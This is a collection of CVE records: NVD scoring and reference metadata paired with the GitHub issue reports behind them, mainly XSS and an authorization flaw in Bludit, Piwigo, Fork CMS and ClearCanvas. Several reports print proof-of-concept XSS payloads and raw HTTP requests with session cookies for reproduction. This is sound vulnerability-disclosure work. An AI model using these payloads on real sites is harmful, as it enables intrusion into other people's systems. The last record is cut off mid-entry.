Hey, I took courtesy of reporting the malicious code injection in `0.4.6` into the CVE database. https://diff.coditsu.io/gems/omniauth-weibo-oauth2/0.4.3/0.4.6 Just wanted to let you know. They initially assigned the `CVE-2019-17268`.
CVE-2019-17268 report for omniauth-weibo-oauth2
https://api.github.com/repos/beenhero/omniauth-weibo-oauth2/issues/36/comments
4
2019-10-09T12:17:49Z
2019-10-14T14:46:19Z
https://github.com/beenhero/omniauth-weibo-oauth2/issues/36
504,613,423
36
1,072
CVE-2020-8788
2020-02-07T14:15:11.437
Synaptive Medical ClearCanvas ImageServer 3.0 Alpha allows XSS (and HTML injection) via the Default.aspx UserName parameter. NOTE: the issues/227 reference does not imply that the affected product can be downloaded from GitHub. It was simply a convenient location for a public bug report.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ClearCanvas/ClearCanvas/issues/227" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ClearCanvas/ClearCanvas/issues/227" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:synaptivemedical:clearcanvas:3.0:alpha:*:*:*:*:*:*", "matchCriteriaId": "E65043C8-07DE-49E3-BFB6-E018EA8A4497", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/ClearCanvas/ClearCanvas/issues/227
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ClearCanvas", "ClearCanvas" ]
Hello, I found two vulnerabilities that affect to ClearCanvas ImageServer 3.0 Alpha: - Cross-site Scripting (XSS) reflected - HTML Injection You can reproduce both with the following details, 1. Payload: <p/onclick=alert(1)>xss 2. Vulnerable POST data: &UserName=<p/onclick=alert(1)>xss 3. Output: <span id="ctl00_ErrorMessagePlaceHolder_ErrorMessageLabel">A potentially dangerous Request.Form value was detected from the client (UserName="<p/onclick=alert(1)>...").</span> 4. Step 1: Open /ImageServer/Pages/Login/Default.aspx or /Pages/Login/Default.aspx URL login page according your config deployments 5. Step 2: Fill the username and password inputs with XSS/HTML payload and submit the login form. 6. Step 3: Then, you will have a XSS/HTML injections clicking on payload. ![ClearCanvas_ImageServer_XSS_1](https://user-images.githubusercontent.com/8358462/61830629-9f455200-ae39-11e9-8d46-93b699aeef3e.png) ![ClearCanvas_ImageServer_XSS_2](https://user-images.githubusercontent.com/8358462/61830647-ab311400-ae39-11e9-86ab-944e2e71cc7d.png) If you need reproduce, fix the issue, or more details about that, please, [feel free to ping me](https://twitter.com/JoshuaProvoste).
Cross-site Scripting (XSS) and HTML Injection on ClearCanvas ImageServer 3.0 Alpha
https://api.github.com/repos/ClearCanvas/ClearCanvas/issues/227/comments
3
2019-07-24T21:37:53Z
2020-02-11T15:40:13Z
https://github.com/ClearCanvas/ClearCanvas/issues/227
472,547,338
227
1,073
CVE-2020-8811
2020-02-07T23:15:10.823
ajax/profile-picture-upload.php in Bludit 3.10.0 allows authenticated users to change other users' profile pictures.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1131" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1131" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "94D51A63-EB8D-4BE4-82B0-E877D79F0C18", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "862" ]
862
https://github.com/bludit/bludit/issues/1131
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bludit", "bludit" ]
### Describe This vulnerability allows authenticated users to change other user's profile pictures. ### Steps to reproduce the vulnerability 1. Tried to login via Administrator privilege. We found 3 accounts.  ![image](https://user-images.githubusercontent.com/60623594/73809507-076fea00-4806-11ea-979d-980be16df3af.png) Moreover, we can access directly to Profile Pictures like this _http://site-name/bludit/bl-content/uploads/profiles/[username].png_ ![image](https://user-images.githubusercontent.com/60623594/73809546-2b333000-4806-11ea-90f8-e0d91f2db4da.png) ![image](https://user-images.githubusercontent.com/60623594/73809557-35edc500-4806-11ea-9063-60ef381455d6.png) ![image](https://user-images.githubusercontent.com/60623594/73809584-40a85a00-4806-11ea-9c9e-28e55d049d4a.png) 2. Tried to login via limit privilege (username: admon2, role: Editor). ![image](https://user-images.githubusercontent.com/60623594/73809622-633a7300-4806-11ea-9ae0-985e7d10f4cd.png) From a HTTP Request to perform to change a user picture. ![image](https://user-images.githubusercontent.com/60623594/73809643-72b9bc00-4806-11ea-8265-8225e6e6c872.png) We could change the username to another username. ![image](https://user-images.githubusercontent.com/60623594/73809679-8c5b0380-4806-11ea-8e52-9ea87ff6607f.png) As a result, we could change to the profile picture of another user. ![image](https://user-images.githubusercontent.com/60623594/73809693-9bda4c80-4806-11ea-95ed-efe6a3ef72ce.png) ![image](https://user-images.githubusercontent.com/60623594/73809708-a563b480-4806-11ea-991d-82e0895119c9.png) Login with Administrator to verify the change via username “admin” and found a profile picture has changed. ![image](https://user-images.githubusercontent.com/60623594/73809728-b3b1d080-4806-11ea-81b4-85fee67e226f.png) In addition, we could arbitrarily create a picture (png) to other directories. ![image](https://user-images.githubusercontent.com/60623594/73809742-bd3b3880-4806-11ea-914f-e7097dade344.png) ![image](https://user-images.githubusercontent.com/60623594/73809753-c5937380-4806-11ea-9b7d-e44756790e04.png) **Comments** The vulnerability doesn't validate an authorization before the upload process. Moreover, it could be pulled username from trusted source ### Bludit version Affected in Bludit v3.10.0 ### PHP version PHP Version 7.1.33
Security - Arbitrary Change Profile Picture
https://api.github.com/repos/bludit/bludit/issues/1131/comments
2
2020-02-05T04:06:25Z
2020-02-05T19:57:22Z
https://github.com/bludit/bludit/issues/1131
560,127,263
1,131
1,074
CVE-2020-8812
2020-02-07T23:15:10.933
Bludit 3.10.0 allows Editor or Author roles to insert malicious JavaScript on the WYSIWYG editor. NOTE: the vendor's perspective is that this is "not a bug.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1132" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1132" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.10.0:-:*:*:*:*:*:*", "matchCriteriaId": "9AE74D8D-8091-45BD-9DC4-C4212FF824F1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/bludit/bludit/issues/1132
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bludit", "bludit" ]
### Describe This vulnerability allows Editor or Author roles could insert malicious JavaScript on the WYSIWYG editor. ### Steps to reproduce the vulnerability Affected in Bludit v3.10.0 1. Tried to login with username “admon2”, who is an Editor. Then, pressed the button. ![image](https://user-images.githubusercontent.com/60623594/73810188-47d06780-4808-11ea-8ef7-195ac7874c88.png) ![image](https://user-images.githubusercontent.com/60623594/73810198-5028a280-4808-11ea-9dd8-3f537c811964.png) We inserted a simple HTML+JavaScript for PoC. ![image](https://user-images.githubusercontent.com/60623594/73810220-5f0f5500-4808-11ea-95c8-fc81c80bf9f7.png) As a result, we could insert malicious JavaScript on the WYSIWYG editor. ![image](https://user-images.githubusercontent.com/60623594/73810233-6a628080-4808-11ea-9bf1-e1c896e59fb5.png) But the CMS had inserted HttpOnly when web applications issued a token to web browser, resulting in the attacker couldn’t steal the cookie. ![image](https://user-images.githubusercontent.com/60623594/73810258-7d755080-4808-11ea-9ed7-86b461882be0.png) But the attacker still crafted malicious JavaScript to do anything. I.e. enforce every legitimate user to logout on the web application ![image](https://user-images.githubusercontent.com/60623594/73810270-89f9a900-4808-11ea-9c23-f7954d5c815b.png) As a result, we could enforce legitimated users to logout. ![image](https://user-images.githubusercontent.com/60623594/73810282-95e56b00-4808-11ea-9850-000dc6798b40.png) ### Bludit version Affected in Bludit v3.10.0 ### PHP version PHP Version 7.1.33
Security - Stored Cross Site Script
https://api.github.com/repos/bludit/bludit/issues/1132/comments
2
2020-02-05T04:14:38Z
2020-02-06T03:31:09Z
https://github.com/bludit/bludit/issues/1132
560,129,293
1,132
1,075
CVE-2014-9470
2020-02-08T17:15:11.247
Cross-site scripting (XSS) vulnerability in the loadForm function in Frontend/Modules/Search/Actions/Index.php in Fork CMS before 3.8.4 allows remote attackers to inject arbitrary web script or HTML via the q_widget parameter to en/search.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2015/Jan/38" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "http://www.fork-cms.com/blog/detail/fork-3.8.4-released" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerability-in-fork-cms-70.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/72017" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d872114" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "https://github.com/forkcms/forkcms/issues/1018s" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2015/Jan/38" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "http://www.fork-cms.com/blog/detail/fork-3.8.4-released" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerability-in-fork-cms-70.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/72017" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d872114" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://github.com/forkcms/forkcms/issues/1018s" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fork-cms:fork_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "AE88F534-F422-464E-B76D-6C52F6ACD4B9", "versionEndExcluding": "3.8.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/forkcms/forkcms/issues/1018s
[ "Broken Link" ]
github.com
[ "forkcms", "forkcms" ]
Link: http://demo.fork-cms.com/en/search?form=search&q_widget="onmouseover="alert(111)"&submit=Search ::REQUEST:: Using a proxy to request GET /en/search?form=search&q_widget="onmouseover="alert('XSS')"&submit=Search HTTP/1.1 Host: demo.fork-cms.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; __utma=23748525.1232410121.1415937482.1419392332.1419480017.3; __utmz=23748525.1419480017.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; frontend_language=s%3A2%3A%22en%22%3B; _ga=GA1.2.1232410121.1415937482; PHPSESSID=gailpg881ubvtsmroh2p1bfqn5 Connection: keep-alive ::RESPONSE:: HTTP/1.1 200 OK Server: nginx/0.5.32 Date: Thu, 25 Dec 2014 10:15:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.3.29-1~dotdeb.0 Set-Cookie: frontend_language=s%3A2%3A%22en%22%3B; expires=Sat, 24-Jan-2015 10:14:11 GMT; path=/; domain=.demo.fork-cms.com; httponly Set-Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; expires=Fri, 25-Dec-2015 10:14:11 GMT; path=/; domain=.demo.fork-cms.com; httponly Cache-Control: private, must-revalidate pragma: no-cache expires: -1 X-server: shared-017 Vary: Accept-Encoding X-Proxy: fosfor Content-Length: 5703 ............. ``` <meta charset="utf-8" /> <meta name="generator" content="Fork CMS" /> <meta name="description" content="Search"> ``` <meta name="keywords" content="Search"> <link rel="canonical" href="http://demo.fork-cms.com/en/search?q="onmouseover="alert('XSS')""> .................
XSS vulnerability
https://api.github.com/repos/forkcms/forkcms/issues/1018/comments
1
2014-12-25T10:31:18Z
2014-12-26T07:13:57Z
https://github.com/forkcms/forkcms/issues/1018
52,858,198
1,018
1,076
CVE-2020-8823
2020-02-10T03:15:10.677
htmlfile in lib/transport/htmlfile.js in SockJS before 0.3.0 is vulnerable to Reflected XSS via the /htmlfile c (aka callback) parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/theyiyibest/Reflected-XSS-on-SockJS" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/theyiyibest/Reflected-XSS-on-SockJS/issues/1" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-SOCKJS-548397" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.sockjs.org" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/theyiyibest/Reflected-XSS-on-SockJS" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/theyiyibest/Reflected-XSS-on-SockJS/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-SOCKJS-548397" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.sockjs.org" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sockjs_project:sockjs:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "CD2CDBA3-3C78-4479-9D2F-C1F5892D1076", "versionEndExcluding": "0.3.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/theyiyibest/Reflected-XSS-on-SockJS/issues/1
[ "Third Party Advisory" ]
github.com
[ "theyiyibest", "Reflected-XSS-on-SockJS" ]
I'm concerned the public text of CVE-2020-8823 isn't well defined enough for development teams to patch the affected library. Can you provide more details to help? Specifically the concern is that product name and version number do not match clearly with SockJS. SockJS seems to be a product family and not a single product. The entire product family does not look to be affected, and the issue seems to reside in sockjs-node. Is this correct? The version number is also confusing, as sockjs-node is currently listed as being v0.3.19. Was the library released on another platform as version 3.0? It would be appreciated if you can help update the CVE text to be more clear about what is affected. I assume this has been reported to the authors of SockJS. They may be able to help pinpoint exactly what needs to be updated in the wording
Affected version and product name accurate?
https://api.github.com/repos/theyiyibest/Reflected-XSS-on-SockJS/issues/1/comments
1
2020-02-14T14:57:10Z
2020-11-12T18:46:29Z
https://github.com/theyiyibest/Reflected-XSS-on-SockJS/issues/1
565,377,653
1
1,077
CVE-2020-8089
2020-02-10T16:15:14.267
Piwigo 2.10.1 is affected by stored XSS via the Group Name Field to the group_list page.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1150" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://piwigo.org/forum/viewforum.php?id=23" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1150" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://piwigo.org/forum/viewforum.php?id=23" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:2.10.1:*:*:*:*:*:*:*", "matchCriteriaId": "8E8B6457-1AF4-4B29-AF6E-9682E45BB2A9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Piwigo/Piwigo/issues/1150
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
Description: Piwigo version 2.10.1 is affected by stored cross site scripting vulnerability. This vulnerability exists in "Group Name" Field in "group_list" page. How to reproduce: 1. Login into the application. 2. Go to the "Users" -> "Groups" page from life navigation menu. 3. Click on "Add Group" button and then in "Group Name" field insert the payload <img src="X" onerror="alert(document.domain)"> and hit add button. CVSS Score: CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N ********************************************************************************************************* POST /piwig/admin.php?page=group_list HTTP/1.1 Host: 172.16.163.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 122 Origin: http://172.16.163.1 Connection: close Cookie: pwg_display_thumbnail=no_display_thumbnail; phavsz=1141x490x1; pwg_id=i6juu2ls6m174g1f0abcjodjs7; user_auth=eyJpdiI6IkxnaGp4T0RGd1BiK2VDUzNWNHpRdlE9PSIsInZhbHVlIjoiU29tK1pzdDQzUDBKcWlRZk5VN04wVUNxR1JXUjdBd1Q5QUtOaUJRbUhyNGVjc0xETWUwWFd0RkpBV2ZJOFBKd3R4N2o2clNTRlhWaWtmc2ttQ2dMM3VrWU0rZ1B5cDJlZnpoUGFCZ2hmaHpJTURTVXJQdCtlbEpyeEp6RzhNUVAiLCJtYWMiOiI4YjY2NTU4N2JhOTc2MzkyZTcwOTQyNWQ3OThkNDZkZjMyODgxYjhjZGQ0NGQ2NTFhMjg3NWRmMzM2OGIwZDYzIn0%3D groupname=%3Cimg+src%3DX+onerror%3Dalert%28document.domain%29%3E&submit_add=Add&pwg_token=46695f2721b77a2840903ba6298796be ********************************************************************************************************* ![Create_Group_title](https://user-images.githubusercontent.com/25206084/72731247-5b00f780-3bb9-11ea-908e-5a57f0f7c4d6.JPG) ![Create_Group_title_2](https://user-images.githubusercontent.com/25206084/72731283-6d7b3100-3bb9-11ea-9e5a-5b5d9914934b.JPG)
Stored Cross-Site Scripting vulnerability in Piwigo CMS
https://api.github.com/repos/Piwigo/Piwigo/issues/1150/comments
1
2020-01-20T13:47:13Z
2020-03-25T14:32:53Z
https://github.com/Piwigo/Piwigo/issues/1150
552,310,420
1,150
1,078
CVE-2020-8840
2020-02-10T21:56:10.653
FasterXML jackson-databind 2.0.0 through 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-01-fastjason-en" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2620" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r078e68a926ea6be12e8404e47f45aabf04bb4668e8265c0de41db6db%40%3Ccommits.druid.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r1c09b9551f6953dbeca190a4c4b78198cdbb9825fce36f96fe3d8218%40%3Cdev.tomee.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r1efc776fc6ce3387593deaa94bbdd296733b1b01408a39c8d1ab9e0e%40%3Cdev.ranger.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r2fa8046bd47fb407ca09b5107a80fa6147ba4ebe879caae5c98b7657%40%3Cdev.ranger.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": 